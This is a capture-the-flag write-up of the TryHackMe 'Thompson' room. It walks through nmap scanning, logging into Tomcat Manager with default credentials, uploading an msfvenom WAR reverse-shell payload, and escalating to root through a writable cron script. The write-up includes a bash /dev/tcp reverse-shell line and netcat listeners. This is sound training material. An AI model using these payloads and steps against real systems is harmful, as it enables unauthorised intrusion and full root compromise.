Welcome again! This time we are back and going to go through another relatively simple CTF: Thompson. https://tryhackme.com/room/bsidesgtthompson
Scanning & Enumeration
As always, begin with enumerating the machine ports:
I got the open ports using a slightly modified version of the Threader3000, which I then fed into nmap where you can see the output.
The command:
nmap -T4 -Pn -p22,8009,8080 -A 10.10.26.73-T4: speed of nmap scan is 4/5 (personal preference of mine)
-Pn: skip pinging the machine being scanned (we already know the host is up)
-p22,8009,8080: only scan the ports specified (the ones we found open)
-A: do an extensive scan on these ports
-{ip}: ip of the machine we are scanning
Enumerating Services
Port 22- ssh
Unless the ssh version being used is super old, we generally won't find a weakness, so we'll skip this for now and come back later, if necessary.
Port 8009- ajp13
Honestly, I didn't know what this service was so I decided I would come back to this later if necessary, especially because Tomcat (a usually vulnerable service) was running on a different port
Port 8080- http
A webserver! This is the kind of thing we're looking for, especially when it's something like Tomcat, which is usually either vulnerable or has some type of default credentials available. So let's visit the webpage and see if we can find anything interesting!
As expected, the webpage is simply a default tomcat webpage. From this we want some sort of login portal so we can test some default credentials.
Clicking on the 'Manager App', you can see it prompts you for some login credentials. Great! That's what we were hoping for.
Vulnerable WebApp
As was mentioned earlier, tomcat is usually configured with default credentials. So I was actually just guessing some easy ones that I found here, when I was forwarded to this page:
Seeing that, I decided to try those credentials and voila!
We are now in the app! Navigating around the app, we see that we have the ability to upload WAR files:
If we enumerate further, we can see that visiting the paths shown in applications brings you to whatever application is there, for example that first application "/docs":
What that means, for us, is that if we upload a payload, and then navigate to it, we can probably get it to execute our payload! With this in mind, let's try to get on the box using a reverse shell. A great resource for creating malicious payloads is the msfvenom cheat sheet. Using this we can see the necessary format for generating a WAR payload:
I generate my payload following that format:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.9.1.161 LPORT=4444 -f war -o shell.warBreaking down the command:
LHOST={ip} my local Kali machine ip that I will be listening on to receive the shell
LPORT={port} the port I choose to listen on
-p java/jsp_shell_reverse_tcp : the type of payload we want to generate
-f war : the format of the payload, in this case WAR
-o shell.war : the file to output the payload to
And then, finally, I attempt to upload the outputted payload to the tomcat server:
Success!
Getting User
Now that we have our payload set up, let's see if we can get it to run, in order to actually get access to the machine.
The first thing we have to do is set up a listener to receive the reverse shell we are going to open up. I do this using netcat (nc):
nc -nvlp 4444Breaking down the command:
-nvlp : this is actually 4 flags all given at once
-p : the local port to listen on
-l : specifies we are going to listen for a connection
-v : verbose; show everything thats happening, errors, success, etc.
-n : resolve numeric IP address only
After setting up our listener, we have to go execute our shellcode by navigating to the proper directory on the tomcat server:
Navigating to the 'shell' path, as we saw it was called after we uploaded it earlier, we see the page hangs. That's good, it usually means it opened a shell! So checking our listener once again:
Sweet! We now are a user on the machine!
Now, notice how the shell isn't like a normal linux or Windows shell that you would get. The first thing I like to do when opening a shell is try to get that normal functionality (called a tty shell). We can try to do that with this python command:
python -c "import pty; pty.spawn('/bin/bash')"As we can see from the prompt, it worked! Great, now lets see if we have access to that user flag, which will normally be in /home/{user}/user.txt
cat /home/jack/user.txt
Not only is it in there, but we can read it!
Getting the root flag
So not only was the user flag in that directory, but there were some interesting other files in there as well. Let's check those out and see what they do:
From these 2 files (test.txt, id.sh), it seems that the id file is a bash script that just echoes the id into the test.txt file. The important information we can get from this, though, is that when we look at the test.txt file, the id is root. That means the the id script is running as root! If we can somehow put commands into that file, then we can execute commands as root!
For the purpose of this CTF, we just want to read the flag, and so we can simply put a command to read the flag in that file. So if we just do that and then run it:
echo 'cat /root/root.txt >> test.txt' >> /home/jack/id.sh'Breaking down the command:
If you're confused about what these linux commands are, that's ok! But instead of explaining them, I'm going to recommend studying them on your own as Linux knowledge is an essential skill in this field.
Uh oh! Permission denied. This is happening because when we try to run the script ourselves, we are running it with our permissions. We have to figure out how that script was running as root. If I had to guess, it was an automated job. Namely, a cron job. Checking out the cron jobs the machine has running, we see:
cat /etc/crontab
And that's exactly what's happening! So all we have to do is wait for that job to kick off. Doing that we get:
And we have the root flag!
Bonus material:
If this wasn't a capture the flag, and instead we wanted code execution and/or a shell, we could instead have repeated the shell process we did earlier (make payload, set up listener). I show that below.
echo 'bash -i >& /dev/tcp/10.9.1.161/5555 0>&1' >> /home/jack/id.sh
nc -nvlp 5555
Same endgame in that we got the root flag, but much more powerful in that we now have a full root shell. Thanks for sticking with me until the end.
As always:
That's all for now, thanks for reading :)
If you want to reach out for questions/feedback you can reach me on the TryHackMe discord server or website under the name bobloblaw!
Good writing thankyou !